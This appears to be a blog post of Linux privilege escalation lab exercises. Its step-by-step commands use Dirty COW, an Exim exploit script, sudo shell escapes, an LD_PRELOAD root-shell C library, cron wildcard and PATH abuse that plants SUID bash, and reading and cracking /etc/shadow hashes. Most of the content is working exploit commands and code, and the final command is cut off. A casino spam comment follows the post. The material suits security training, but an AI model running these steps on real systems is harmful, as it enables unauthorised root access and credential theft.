Saturday, 4 August 2018

Linux Local Privilege Escalation Exercises

Exercise 1 – Kernel




1. In command prompt type:
gcc -pthread /home/user/tools/dirtycow/c0w.c -o c0w
2. In command prompt type: ./c0w
3. In command prompt type: passwd
4. In command prompt type: id



Exercise 2 – Daemons

Exim’s version is below 4.86.2
1. In command prompt type: /home/user/tools/exim/cve-2016-1531.sh
2. In command prompt type: id



Exercise 3 – Password Mining (Configuration Files)

1. In command prompt type: cat /home/user/.irssi/config | grep -i passw
2. From the output, make note of the clear-text credentials.



Exercise 4 – Password Mining (History)


1. In command prompt type: cat ~/.bash_history | grep -i passw
2. From the output, make note of the clear-text credentials.





Exercise 5 – Sudo (Shell Escape Sequences)

Linux VM
1. In command prompt type: sudo -l
2. From the output, notice the list of programs that can run via sudo.

Exploitation
1. In command prompt type any of the following:
a. sudo find /bin -name nano -exec /bin/sh \;
b. sudo awk 'BEGIN {system("/bin/sh")}'
c. echo "os.execute('/bin/sh')" > shell.nse && sudo nmap --script=shell.nse
d. sudo vim -c '!sh'





Exercise 6 – Sudo (Abusing Intended Functionality)

1. In command prompt type: sudo -l
2. From the output, notice the list of programs that can run via sudo.
3. In command prompt type:
sudo apache2 -f /etc/shadow
4. From the output, copy the root hash.
Open command prompt and type:
echo '[Pasted Root Hash]' > hash.txt
5. In command prompt type:
john --wordlist=/usr/share/wordlists/nmap.lst hash.txt
6. From the output, notice the cracked credentials.


with Johnny:




Exercise 7 – Sudo (LD_PRELOAD)

Linux VM
1. In command prompt type: sudo -l
2. From the output, notice that the LD_PRELOAD environment variable is intact.
Exploitation
1. Open a text editor and type: 
#include <stdio.h> 
#include <sys/types.h> 
#include <stdlib.h> 
void _init()

unsetenv("LD_PRELOAD");
 setgid(0);
 setuid(0);
 system("/bin/bash");

 }
2. Save the file as x.c
3. In command prompt type:
gcc -fPIC -shared -o /tmp/x.so x.c -nostartfiles
4. In command prompt type:
sudo LD_PRELOAD=/tmp/x.so apache2
5. In command prompt type: id


Exercise 8 – Cron (Path)

1. In command prompt type: cat /etc/crontab
2. From the output, notice the value of the “PATH” variable.
Exploitation
Linux VM
3. In command prompt type:
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/overwrite.sh
4. In command prompt type: chmod +x /home/user/overwrite.sh
5. Wait 1 minute for the Bash script to execute.
6. In command prompt type: /tmp/bash -p
7. In command prompt type: id




Exercise 9 – Cron (Wildcards)

Linux VM
1. In command prompt type: cat /etc/crontab
2. From the output, notice the script “/usr/local/bin/compress.sh”
3. In command prompt type: cat /usr/local/bin/compress.sh
4. From the output, notice the wildcard (*) used by ‘tar’.
Exploitation
Linux VM
1. In command prompt type:
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/runme.sh
2. touch /home/user/--checkpoint=1
3. touch /home/user/--checkpoint-action=exec=sh\ runme.sh
4. Wait 1 minute for the Bash script to execute.
5. In command prompt type: /tmp/bash -p
6. In command prompt type: id



Exercise 10– Cron (File Overwrite)

Linux VM
1. In command prompt type: cat /etc/crontab
2. From the output, notice the script “overwrite.sh”
3. In command prompt type: ls -l /usr/local/bin/overwrite.sh
4. From the output, notice the file permissions.
Exploitation
Linux VM
1. In command prompt type:
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' >> /usr/local/bin/overwrite.sh
2. Wait 1 minute for the Bash script to execute.
3. In command prompt type: /tmp/bash -p
4. In command prompt type: id



Exercise 11 – File Permissions (SUID Binary – Environment Variables #1)

Detection
Linux VM
1. In command prompt type: find / -type f -perm -04000 -ls 2>/dev/null
2. From the output, make note of all the SUID binaries.
3. In command prompt type: strings /usr/local/bin/suid-env
4. From the output, notice the functions used by the binary.
Exploitation
Linux VM
1. In command prompt type:
echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/service.c
2. In command prompt type: gcc /tmp/service.c -o /tmp/service
3. In command prompt type: export PATH=/tmp:$PATH
4. In command prompt type: /usr/local/bin/suid-env
5. In command prompt type: id


Exercise 12 – File Permissions (SUID Binary – Environment Variables #2)


Detection
Linux VM
1. In command prompt type: find / -type f -perm -04000 -ls 2>/dev/null
2. From the output, make note of all the SUID binaries.
3. In command prompt type: strings /usr/local/bin/suid-env
4. From the output, notice the functions used by the binary.
Exploitation Method #1
Linux VM
1. In command prompt type:
function /usr/sbin/service() { cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p; }
2. In command prompt type:
export -f /usr/sbin/service
3. In command prompt type: /usr/local/bin/suid-env2
Exploitation Method #2
Linux VM
1. In command prompt type:
env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp && chown root.root /tmp/bash && chmod +s /tmp/bash)' /bin/sh -c '/usr/local/bin/suid-env2; set +x; /tmp/bash -p


1 comment:

  1. Coin Casino Canada Review and Bonus Codes 2021
    The ⭐ coin casino is a safe, legal and regulated online 바카라 사이트 gambling 인카지노 site with games from Microgaming, Playtech, and Microgaming. We also cover the mobile  Rating: kadangpintar 9/10 · ‎Review by welife

    ReplyDelete